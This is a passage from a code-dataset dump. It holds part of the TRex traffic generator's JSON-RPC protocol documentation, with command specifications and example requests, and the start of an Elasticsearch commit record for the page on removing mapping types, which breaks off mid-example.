and\nin general execute remote calls on TRex\n\nIn this document we will provide information on\nhow a client can implement the protocol used to communicate with TRex\n\nIn general, we will describe the following:\n\n* *Transport Layer* - The transport layer used to communicate with TRex server\n* *RPC Reprensentation Protocol* - The format in which remote procedures are carried\n\n=== Transport Layer\n\nTRex server transport layer is implemented using ZMQ.\n\nThe default configuration is TCP on port 5555, however this is configurable.\n\n{zwsp} +\nThe communication model is based on the request-reply ZMQ model:\n\nhttp:\/\/zguide.zeromq.org\/page:all#Ask-and-Ye-Shall-Receive\n\n{zwsp} +\n\nfor more on ZMQ and implementation please refer to:\n{zwsp} +\nhttp:\/\/zeromq.org\/intro:read-the-manual\n\n=== RPC Reprensentation Protocol\n\nThe RPC reprensentation protocol is JSON RPC v2.0.\nEvery request and response will be encoded in a JSON RPC v2.0 format.\n\n{zwsp} +\n\nFor more info on JSON RPC v2.0 spec please refer to:\n{zwsp} +\n\nhttp:\/\/www.jsonrpc.org\/specification\n\n{zwsp} +\n\nLater on in the document we will describe all the supported commands.\n\n=== TRex RPC Mock Server\nBefore we get into the commands, it's worth mentioning that TRex has a mock RPC server\ndesigned to allow playing around with the server in order to understand the 
response\nand perform adjustments to the request.\n\nTRex also provides a Python based console that can connect to the server (mock or real) and\nsend various commands to the server.\n\n==== Building The Mock Server\nBuilding the mock server is performed like this:\n[source,bash]\n----\ntrex-core\/linux> .\/b configure\ntrex-core\/linux> .\/b --target=mock-rpc-server-64-debug\n----\n\n==== Running The Mock Server\nLaunching the mock server is performed like this:\n\n[source,bash]\n----\n \ntrex-core\/scripts> .\/mock-rpc-server-64-debug\n\n-= Starting RPC Server Mock =-\n\nListening on tcp:\/\/localhost:5050 [ZMQ]\n\nSetting Server To Full Verbose\n\nServer Started\n\n----\n\n==== Using The TRex Console To Interact\nWhen the mock server is up, you can already send commands to the server.\n{zwsp} +\n{zwsp} +\n\nLet's demonstrate the operation with the Python based TRex console:\n\n{zwsp} +\n\n[source,bash]\n----\ntrex-core\/scripts> .\/trex-console\n\nConnecting To RPC Server On tcp:\/\/localhost:5050\n[SUCCESS]\n\n\n-=TRex Console V1.0=-\n\nType 'help' or '?' for supported actions\n\nTRex >\n\n----\nAs we will see later on, a basic RPC command supported by the server is 'ping'.\n{zwsp} +\nLet's issue a ping command to the server and see what happens on both sides:\n\n{zwsp} +\n{zwsp} +\n\nOn the 'client' side:\n\n[source,bash]\n----\nTRex > verbose on\n\nverbose set to on\n\nTRex > ping\n\n-> Pinging RPC server\n[verbose] Sending Request To Server:\n\n{\n \"id\": \"l0tog11a\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"ping\",\n \"params\": {}\n}\n\n[verbose] Server Response:\n\n{\n \"id\": \"l0tog11a\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n[SUCCESS]\n\n----\nOn the 'server' side:\n\n[source,bash]\n----\n\ntrex-core\/scripts> .\/mock-rpc-server-64-debug\n\n-= Starting RPC Server Mock =-\n\nListening on tcp:\/\/localhost:5050 [ZMQ]\n\nSetting Server To Full Verbose\n\nServer Started\n\n\n[verbose][req resp] Server Received:\n\n{\n \"id\" : \"maa5a3g1\",\n \"jsonrpc\" : \"2.0\",\n \"method\" : \"ping\",\n \"params\" : {}\n}\n\n[verbose][req resp] Server Replied:\n\n{\n \"id\" : \"maa5a3g1\",\n \"jsonrpc\" : \"2.0\",\n \"result\" : \"ACK\"\n}\n\n----\n\n== RPC Server State Machine\nThe RPC server can be in numbered of states, each state provides other subset of the commands\nthat are allowed to be executed.\n\nWe define the following possible states:\n\n* *unowned* - The server is either unowned or another user is owning the device\n* *owned* - The server has been acquired by the client\n* *active* - The server is in the middle of injecting traffic - currently active\n\nEach command will specify on which states it is possible to execute it.\n\nFor commands valid only on 'owned' or 'active', a field called ''handler'' 'MUST' be passed\nalong with the rest of the parameters.\n\n\nThis will identify the connection.\n\nimage::images\/rpc_states.png[title=\"RPC Server States\",align=\"left\",width=200, link=\"images\/rpc_states.png\"]\n\n== RPC Commands\nThe following RPC commands are supported\n\n=== Ping\n* *Name* - 'ping'\n* *Valid States* - 'all'\n* *Description* - Pings the TRex server\n* *Paramters* - None\n* *Result* - \"ACK\" On Sucess\n\nExample:\n\n[source,bash]\n----\n'Request':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"ping\",\n \"params\": null\n}\n\n'Response':\n\n{\n \"jsonrpc\" : \"2.0\",\n \"id\" : 1,\n \"result\" : \"ACK\"\n}\n\n----\n\n=== Get Registered Commands\n* *Name* - 'get_reg_cmds'\n* *Valid States* - 'all'\n* *Description* - Queries the 
server for all the registered commands\n* *Paramters* - None\n* *Result* - A list of all the supported commands by the server\n\nExample:\n\n[source,bash]\n----\n'Request':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"get_reg_cmds\",\n \"params\": null\n}\n\n\n'Response':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"result\": [\n \"remove_all_streams\",\n \"remove_stream\",\n \"add_stream\",\n \"get_reg_cmds\",\n \"ping\",\n \"test_sub\",\n \"get_version\",\n \"test_add\"\n ]\n}\n\n----\n\n\n=== Get Version\n* *Name* - 'get_version'\n* *Valid States* - 'all'\n* *Description* - Queries the server for version information\n* *Paramters* - None\n* *Result* - See table below\n\n.Object type 'return values for get_version' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| version | string | TRex version\n| build_date | string | build date\n| build_time | string | build time\n| built_by | string | who built this version\n|=================\n\n=== Get System Info\n* *Name* - 'get_system_info'\n* *Description* - Queries the server for system properties\n* *Paramters* - None\n* *Result* - See table below\n\n.return value: 'get_system_info'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| dp_core_count | int | DP core count\n| core_type | string | DP core type\n| hostname | string | machine host name\n| ip | string | machine IP\n| uptime | string | uptime of the server\n| port_count | int | number of ports on the machine\n| ports | array | arary of object ''port'' - see below\n|=================\n\n.return value: 'get_system_info'.'port'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| driver | string | driver type\n| speed | string | speed of the port (1g, 10g, 40g, 100g)\n| status | string | up \/ down\n|=================\n\n\n=== Get Owner\n* *Name* - 'get_owner'\n* *Valid States* - 'all'\n* *Description* - Queries the server for current owner\n* *Paramters* - None\n* *Result* ['string'] - owner name if exists, otherwise 'none'\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"hxjkuwj9\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_owner\",\n \"params\": null\n}\n\n'Response':\n\n{\n \"id\": \"hxjkuwj9\",\n \"jsonrpc\": \"2.0\",\n \"result\": {\n \"owner\": \"itay\"\n }\n}\n\n----\n\n=== Acquire\n* *Name* - 'Acquire'\n* *Valid States* - 'all'\n* *Description* - Takes ownership on the device.\n* *Paramters* -\n** *user* ['string'] - User name aquiring the system\n** *force* ['boolean'] - force action even if another user is holding the device\n* *Result* ['string'] - 'unique' identifier for future requests\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"b1tr56yz\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"Acquire\",\n \"params\": {\n \"force\": false,\n \"user\": \"itay\"\n }\n}\n\n\n'Response':\n\n{\n \"id\": \"b1tr56yz\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"4cBWDxS2\"\n}\n----\n\n\n=== Release\n* *Name* - 'release'\n* *Valid States* - 'owned'\n* *Description* - Release owernship over the device\n* *Paramters* -\n** *handler* ['string'] - unique identifier for the message\n* *Result* ['string'] - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"m785dxwd\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"release\",\n \"params\": {\n \"handler\": \"37JncCHr\"\n }\n}\n\n\n'Response':\n\n{\n \"id\": \"m785dxwd\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n----\n\n\n=== Add Stream\n* *Name* - 'add_stream'\n* *Valid States* - 
'owned'\n* *Description* - Adds a stream to a port\n* *Paramters* \n** *port_id* - port id associated with this stream\n** *stream_id* - stream id associated with the stream object\n** *stream* - object of type xref:stream_obj['stream']\n* *Result* - ACK in case of success\n\n==== Object type 'stream' anchor:stream_obj[]\n\nAdd_stream gets a single parameter of type object.\n\nThe format of that object is as follows:\n\n.Object type 'stream' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| enabled | boolean | is this stream enabled\n| self_start | boolean | is this stream triggered by starting injection or triggered by another stream\n| isg | double | ['usec'] inter stream gap - delay time in usec until the stream is started\n| next_stream | int | next stream to start after this stream. -1 means stop after this stream\n| packet | object | object of type xref:packet_obj['packet']\n| mode | object | object of type xref:mode_obj['mode']\n| vm | array | array of objects of type xref:vm_obj['vm']\n| rx_stats | object | object of type xref:rx_stats_obj['rx_stats']\n|=================\n\n===== Object type 'packet' anchor:packet_obj[]\npacket contains binary and meta data\n\n.Object type 'packet'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| binary | byte array | binary dump of the packet to be used in the stream as array of bytes\n| meta | string | meta data object. opaque to the RPC server. will be passed on queries\n|=================\n\n===== Object type 'mode' anchor:mode_obj[]\nmode object can be 'one' of the following objects:\n\n.Object type 'mode - continuous' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''continuous''\n| pps | double | rate in packets per second \n|=================\n\n.Object type 'mode - single_burst' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''single_burst''\n| pps | double | rate in packets per second \n| total pkts | int | total packets in the burst\n|=================\n\n.Object type 'mode - multi_burst' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''multi_burst''\n| pps | int | rate in packets per second \n| pkts_per_burst | int | packets in a single burst\n| ibg | double | ['usec'] inter burst gap. delay between bursts in usec\n| count | int | number of bursts. 
''0'' means loop forever, ''1'' will fall back to single burst\n|=================\n\n===== Object type 'vm' anchor:vm_obj[]\nArray of VM instruction objects to be used with this stream\n\nAny element in the array can be one of the following object types:\n\n.Object type 'vm - fix_checksum_ipv4'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''fix_checksum_ipv4''\n| pkt_offset | uint16 | offset of the field to fix \n|=================\n\n.Object type 'vm - flow_var'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''flow_var'''\n| name | string | flow var name - this should be a unique identifier\n| size | [1,2,4,8] | size of the flow var in bytes\n| op | ['inc', 'dec', 'random'] | operation type to perform on the field\n| init value | uint64_t as string | init value for the field\n| min value | uint64_t as string | minimum value for the field\n| max value | uint64_t as string | maximum value for the field\n|=================\n\n.Object type 'vm - write_flow_var'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''write_flow_var''\n| name | string | flow var name to write\n| pkt_offset | uint16 | offset at the packet to perform the write\n| add_value | int | delta to add to the field prior to writing - can be negative\n| is_big_endian | boolean | should write as big endian or little \n|=================\n\n\n===== Object type 'rx_stats' anchor:rx_stats_obj[]\nDescribes rx stats for the stream\n\n{zwsp} +\n\n'IMPORTANT':\n\nIn case rx_stats is enabled, meta data will be written in the end of the packet.\n\nplease consider the following:\n\n==== Constrains\n* *performance* - this will have performance impact as rx packets will be examined\n* *override* - up to 10 bytes at the end of the packet will be overidden by the meta data required\n\n==== The bytes needed for activating 'rx_stats':\n\n* *rx_stream_id* consumes 2 bytes\n* *seq_enabled* consumes 4 bytes\n* *latency_enabled* consumes 4 bytes\n\nso if no seq or latency are enabled 2 bytes will be used.\n\n\nif seq or latency alone are enabled, 6 bytes will be used.\n\n\nif both are enabled then 10 bytes will be used.\n\n\n.Object type 'rx_stats'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| enabled | boolean | is rx_stats enabled for this stream\n| seq_enabled | boolean | should write 32 bit sequence\n| latency_enabled | boolean | should write 32 bit latency\n|=================\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"add_stream\",\n \"params\": {\n \"port_id\": 1,\n\t\"stream_id\": 502\n \"stream\": {\n \"enabled\": true,\n \"isg\": 4.3,\n \"mode\": {\n \"pps\": 3,\n \"total_pkts\": 5000,\n \"type\": \"single_burst\"\n },\n \"next_stream_id\": -1,\n \"packet\": {\n \"binary\": [\n 4,\n 1,\n 255\n ],\n \"meta\": \"\"\n },\n \"rx_stats\": {\n \"enabled\": false\n },\n \"self_start\": true,\n }\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n=== Remove Stream\n* *Name* - 'remove_stream'\n* *Valid States* - 'owned'\n* *Description* - Removes a stream from a port\n* *Paramters*\n** *port_id* - port assosicated with the stream.\n** *stream_id* - stream to remove\n\n* *Result* - ACK in case of success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1\n \"jsonrpc\": \"2.0\",\n \"method\": \"remove_stream\",\n \"params\": 
{\n \"port_id\": 1,\n \"stream_id\": 502\n }\n}\n\n\n'Response':\n\n{\n \"id\": 1\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n----\n\n=== Get Stream ID List\n* *Name* - 'get_stream_list'\n* *Valid States* - 'owned', 'active'\n* *Description* - fetch all the assoicated streams for a port\n* *Paramters*\n** *port_id* - port to query for registered streams\n\n* *Result* - array of 'stream_id'\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_stream_list\",\n \"params\": {\n \"port_id\": 1\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": [\n 502,\n 18\n ]\n}\n\n\n----\n\n=== Get Stream\n* *Name* - 'get_stream'\n* *Valid States* - 'owned', 'active'\n* *Description* - get a specific stream object\n* *Paramters*\n** *port_id* - port for the associated stream\n** *stream_id* - the requested stream id\n\n* *Result* - object xref:stream_obj['stream']\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_stream\",\n \"params\": {\n \"port_id\": 1,\n \"stream_id\": 7\n }\n}\n\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": {\n \"stream\": {\n \"enabled\": true,\n \"isg\": 4.3,\n \"mode\": {\n \"pps\": 3,\n \"type\": \"continuous\"\n },\n \"next_stream_id\": -1,\n \"packet\": {\n \"binary\": [\n 4,\n 1,\n 255\n ],\n \"meta\": \"\"\n },\n \"self_start\": true\n }\n }\n}\n\n----\n\n\n=== Remove All Streams\n* *Name* - 'remove_all_streams'\n* *Valid States* - 'owned'\n* *Description* - remove all streams from a port\n* *Paramters*\n** *port_id* - port for the associated stream\n\n* *Result* - \"ACK\" on success\n\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"remove_all_streams\",\n \"params\": {\n \"port_id\": 2\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n=== Start Traffic\n* *Name* - 'start_traffic'\n* *Valid States* - 'owned'\n* *Description* - Starts the traffic on a specific port. if traffic has already started an error will be returned\n* *Paramters*\n** *port_id* - port for starting the traffic, -1 for starting all the ports\n\n* *Result* - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{ \n \"id\": \"b3llt8hs\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"start_traffic\",\n \"params\": {\n \"port_id\": 3\n }\n\n'Response':\n\n{\n \"id\": \"b3llt8hs\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n=== Stop Traffic\n* *Name* - 'stop_traffic'\n* *Valid States* - 'active'\n* *Description* - Stops the traffic on a specific port. if the port has already started nothing will happen\n* *Paramters*\n** *port_id* - port for stopping the traffic, -1 for stopping all the ports\n\n* *Result* - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"h2fyhni7\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"stop_traffic\",\n \"params\": {\n \"port_id\": 3\n }\n}\n\n'Response':\n\n{\n \"id\": \"h2fyhni7\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89d65808854906977b2c4128ff1dc96bc4cbfb1f","subject":"Update headline of the \"removal of types\" doc page to match changes in 7.0. (#40868)","message":"Update headline of the \"removal of types\" doc page to match changes in 7.0. 
(#40868)\n\nCurrently it describes what broke in 6.0.\r\n","repos":"scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/mapping\/removal_of_types.asciidoc","new_file":"docs\/reference\/mapping\/removal_of_types.asciidoc","new_contents":"[[removal-of-types]]\n== Removal of mapping types\n\nIMPORTANT: Indices created in Elasticsearch 7.0.0 or later no longer accept a\n`_default_` mapping. Indices created in 6.x will continue to function as before\nin Elasticsearch 6.x. Types are deprecated in APIs in 7.0, with breaking changes\nto the index creation, put mapping, get mapping, put template, get template and\nget field mappings APIs.\n\n[float]\n=== What are mapping types?\n\nSince the first release of Elasticsearch, each document has been stored in a\nsingle index and assigned a single mapping type. A mapping type was used to\nrepresent the type of document or entity being indexed, for instance a\n`twitter` index might have a `user` type and a `tweet` type.\n\nEach mapping type could have its own fields, so the `user` type might have a\n`full_name` field, a `user_name` field, and an `email` field, while the\n`tweet` type could have a `content` field, a `tweeted_at` field and, like the\n`user` type, a `user_name` field.\n\nEach document had a `_type` meta-field containing the type name, and searches\ncould be limited to one or more types by specifying the type name(s) in the\nURL:\n\n[source,js]\n----\nGET twitter\/user,tweet\/_search\n{\n \"query\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n\nThe `_type` field was combined with the document's `_id` to generate a `_uid`\nfield, so documents of different types with the same `_id` could exist in a\nsingle index.\n\nMapping types were also used to establish a\n<<mapping-parent-field,parent-child relationship>>\nbetween documents, so documents of type `question` could be parents to\ndocuments of type `answer`.\n\n[float]\n=== Why are mapping types being removed?\n\nInitially, we spoke about an ``index'' being similar to a ``database'' in an\nSQL database, and a ``type'' being equivalent to a\n``table''.\n\nThis was a bad analogy that led to incorrect assumptions. In an SQL database,\ntables are independent of each other. The columns in one table have no\nbearing on columns with the same name in another table. This is not the case\nfor fields in a mapping type.\n\nIn an Elasticsearch index, fields that have the same name in different mapping\ntypes are backed by the same Lucene field internally. 
In other words, using\nthe example above, the `user_name` field in the `user` type is stored in\nexactly the same field as the `user_name` field in the `tweet` type, and both\n`user_name` fields must have the same mapping (definition) in both types.\n\nThis can lead to frustration when, for example, you want `deleted` to be a\n`date` field in one type and a `boolean` field in another type in the same\nindex.\n\nOn top of that, storing different entities that have few or no fields in\ncommon in the same index leads to sparse data and interferes with Lucene's\nability to compress documents efficiently.\n\nFor these reasons, we have decided to remove the concept of mapping types from\nElasticsearch.\n\n[float]\n=== Alternatives to mapping types\n\n[float]\n==== Index per document type\n\nThe first alternative is to have an index per document type. Instead of\nstoring tweets and users in a single `twitter` index, you could store tweets\nin the `tweets` index and users in the `user` index. Indices are completely\nindependent of each other and so there will be no conflict of field types\nbetween indices.\n\nThis approach has two benefits:\n\n* Data is more likely to be dense and so benefit from compression techniques\n used in Lucene.\n\n* The term statistics used for scoring in full text search are more likely to\n be accurate because all documents in the same index represent a single\n entity.\n\nEach index can be sized appropriately for the number of documents it will\ncontain: you can use a smaller number of primary shards for `users` and a\nlarger number of primary shards for `tweets`.\n\n[float]\n==== Custom type field\n\nOf course, there is a limit to how many primary shards can exist in a cluster\nso you may not want to waste an entire shard for a collection of only a few\nthousand documents. In this case, you can implement your own custom `type`\nfield which will work in a similar way to the old `_type`.\n\nLet's take the `user`\/`tweet` example above. 
Originally, the workflow would\nhave looked something like this:\n\n[source,js]\n----\nPUT twitter\n{\n \"mappings\": {\n \"user\": {\n \"properties\": {\n \"name\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"email\": { \"type\": \"keyword\" }\n }\n },\n \"tweet\": {\n \"properties\": {\n \"content\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"tweeted_at\": { \"type\": \"date\" }\n }\n }\n }\n}\n\nPUT twitter\/user\/kimchy\n{\n \"name\": \"Shay Banon\",\n \"user_name\": \"kimchy\",\n \"email\": \"shay@kimchy.com\"\n}\n\nPUT twitter\/tweet\/1\n{\n \"user_name\": \"kimchy\",\n \"tweeted_at\": \"2017-10-24T09:00:00Z\",\n \"content\": \"Types are going away\"\n}\n\nGET twitter\/tweet\/_search\n{\n \"query\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n\nYou can achieve the same thing by adding a custom `type` field as follows:\n\n[source,js]\n----\nPUT twitter\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"type\": { \"type\": \"keyword\" }, <1>\n \"name\": { \"type\": \"text\" },\n \"user_name\": { \"type\": \"keyword\" },\n \"email\": { \"type\": \"keyword\" },\n \"content\": { \"type\": \"text\" },\n \"tweeted_at\": { \"type\": \"date\" }\n }\n }\n }\n}\n\nPUT twitter\/_doc\/user-kimchy\n{\n \"type\": \"user\", <1>\n \"name\": \"Shay Banon\",\n \"user_name\": \"kimchy\",\n \"email\": \"shay@kimchy.com\"\n}\n\nPUT twitter\/_doc\/tweet-1\n{\n \"type\": \"tweet\", <1>\n \"user_name\": \"kimchy\",\n \"tweeted_at\": \"2017-10-24T09:00:00Z\",\n \"content\": \"Types are going away\"\n}\n\nGET twitter\/_search\n{\n \"query\": {\n \"bool\": {\n \"must\": {\n \"match\": {\n \"user_name\": \"kimchy\"\n }\n },\n \"filter\": {\n \"match\": {\n \"type\": \"tweet\" <1>\n }\n }\n }\n }\n}\n----\n\/\/ NOTCONSOLE\n<1> The explicit `type` field takes the place of the implicit `_type` field.\n\n[float]\n==== Parent\/Child without mapping types\n\nPreviously, a parent-child relationship was represented by making one mapping\ntype the parent, and one or more other mapping types the children. Without\ntypes, we can no longer use this syntax. The parent-child feature will\ncontinue to function as before, except that the way of expressing the\nrelationship between documents has been changed to use the new\n<<parent-join,`join` field>>.\n\n\n[float]\n=== Schedule for removal of mapping types\n\nThis is a big change for our users, so we have tried to make it as painless as\npossible. The change will roll out as follows:\n\nElasticsearch 5.6.0::\n\n* Setting `index.mapping.single_type: true` on an index will enable the\n single-type-per-index behaviour which will be enforced in 6.0.\n\n* The <<parent-join,`join` field>> replacement for parent-child is available\n on indices created in 5.6.\n\nElasticsearch 6.x::\n\n* Indices created in 5.x will continue to function in 6.x as they did in 5.x.\n\n* Indices created in 6.x only allow a single-type per index. Any name\n can be used for the type, but there can be only one. The preferred type name\n is `_doc`, so that index APIs have the same path as they will have in 7.0:\n `PUT {index}\/_doc\/{id}` and `POST {index}\/_doc`\n\n* The `_type` name can no longer be combined with the `_id` to form the `_uid`\n field. 
The `_uid` field has become an alias for the `_id` field.\n\n* New indices no longer support the old-style of parent\/child and should\n use the <<parent-join,`join` field>> instead.\n\n* The `_default_` mapping type is deprecated.\n\n* In 6.7, the index creation, index template, and mapping APIs support a query\n string parameter (`include_type_name`) which indicates whether requests and\n responses should include a type name. It defaults to `true`, and should be set\n to an explicit value to prepare to upgrade to 7.0. Not setting `include_type_name`\n will result in a deprecation warning. Indices which don't have an explicit type will\n use the dummy type name `_doc`.\n\nElasticsearch 7.x::\n\n* Specifying types in requests is deprecated. For instance, indexing a\n document no longer requires a document `type`. The new index APIs\n are `PUT {index}\/_doc\/{id}` in case of explicit ids and `POST {index}\/_doc`\n for auto-generated ids.\n\n* The `include_type_name` parameter in the index creation, index template,\n and mapping APIs will default to `false`. Setting the parameter at all will\n result in a deprecation warning.\n\n* The `_default_` mapping type is removed.\n\nElasticsearch 8.x::\n\n* Specifying types in requests is no longer supported.\n\n* The `include_type_name` parameter is removed.\n\n[float]\n=== Migrating multi-type indices to single-type\n\nThe <<docs-reindex,Reindex API>> can be used to convert multi-type indices to\nsingle-type indices. The following examples can be used in Elasticsearch 5.6\nor Elasticsearch 6.x. In 6.x, there is no need to specify\n`index.mapping.single_type` as that is the default.\n\n[float]\n==== Index per document type\n\nThis first example splits our `twitter` index into a `tweets` index and a\n`users` index:\n\n[source,js]\n----\nPUT users\n{\n \"settings\": {\n \"index.mapping.single_type\": true\n },\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"name\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"email\": {\n \"type\": \"keyword\"\n }\n }\n }\n }\n}\n\nPUT tweets\n{\n \"settings\": {\n \"index.mapping.single_type\": true\n },\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"content\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"tweeted_at\": {\n \"type\": \"date\"\n }\n }\n }\n }\n}\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"user\"\n },\n \"dest\": {\n \"index\": \"users\"\n }\n}\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"tweet\"\n },\n \"dest\": {\n \"index\": \"tweets\"\n }\n}\n----\n\/\/ NOTCONSOLE\n\n[float]\n==== Custom type field\n\nThis next example adds a custom `type` field and sets it to the value of the\noriginal `_type`. 
It also adds the type to the `_id` in case there are any\ndocuments of different types which have conflicting IDs:\n\n[source,js]\n----\nPUT new_twitter\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"type\": {\n \"type\": \"keyword\"\n },\n \"name\": {\n \"type\": \"text\"\n },\n \"user_name\": {\n \"type\": \"keyword\"\n },\n \"email\": {\n \"type\": \"keyword\"\n },\n \"content\": {\n \"type\": \"text\"\n },\n \"tweeted_at\": {\n \"type\": \"date\"\n }\n }\n }\n }\n}\n\n\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n },\n \"script\": {\n \"source\": \"\"\"\n ctx._source.type = ctx._type;\n ctx._id = ctx._type + '-' + ctx._id;\n ctx._type = '_doc';\n \"\"\"\n }\n}\n----\n\/\/ NOTCONSOLE\n\n[float]\n=== Typeless APIs in 7.0\n\nIn Elasticsearch 7.0, each API will support typeless requests,\nand specifying a type will produce a deprecation warning.\n\nNOTE: Typeless APIs work even if the target index contains a custom type.\nFor example, if an index has the custom type name `my_type`, we can add\ndocuments to it using typeless `index` calls, and load documents with typeless\n`get` calls.\n\n[float]\n==== Indices APIs\n\nIndex creation, index template, and mapping APIs support a new `include_type_name`\nURL parameter that specifies whether mapping definitions in requests and responses\nshould contain the type name. The parameter defaults to `true` in version 6.7 to\nmatch the pre-7.0 behavior of using type names in mappings. It defaults to `false`\nin version 7.0 and will be removed in version 8.0.\n\nIt should be set explicitly in 6.7 to prepare to upgrade to 7.0. To avoid deprecation\nwarnings in 6.7, the parameter can be set to either `true` or `false`. In 7.0, setting\n`include_type_name` at all will result in a deprecation warning.\n\nHere are some example interactions with Elasticsearch with this option set to `false`:\n\n[source,js]\n--------------------------------------------------\nPUT index?include_type_name=false\n{\n \"mappings\": {\n \"properties\": { <1>\n \"foo\": {\n \"type\": \"keyword\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[source,js]\n--------------------------------------------------\nPUT index\/_mappings?include_type_name=false\n{\n \"properties\": { <1>\n \"bar\": {\n \"type\": \"text\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n<1> Mappings are included directly under the `mappings` key, without a type name.\n\n[source,js]\n--------------------------------------------------\nGET index\/_mappings?include_type_name=false\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe above call returns:\n\n[source,js]\n--------------------------------------------------\n{\n \"index\": {\n \"mappings\": {\n \"properties\": { <1>\n \"foo\": {\n \"type\": \"keyword\"\n },\n \"bar\": {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ 